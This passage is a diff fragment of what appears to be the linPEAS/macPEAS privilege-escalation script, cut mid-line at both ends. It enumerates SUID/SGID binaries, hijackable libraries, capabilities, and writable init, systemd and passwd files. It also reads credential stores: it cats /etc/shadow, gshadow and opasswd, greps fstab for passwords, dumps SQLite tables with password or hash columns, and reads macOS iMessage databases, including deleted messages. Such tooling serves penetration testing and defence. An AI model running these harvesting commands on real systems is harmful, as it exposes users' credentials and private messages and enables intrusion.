".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi fi done - echo "" + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi fi fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" done fi - echo "" +done +echo "" - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," fi - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" +##-- IF) Users with capabilities +print_2title "Users with capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else echo_not_found "/etc/security/capability.conf" +fi +echo "" - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + +print_2title "Broken links in path" +echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; +done +echo "" + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Writable in passwd file +print_list "Writable passwd file? ................ " +if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed 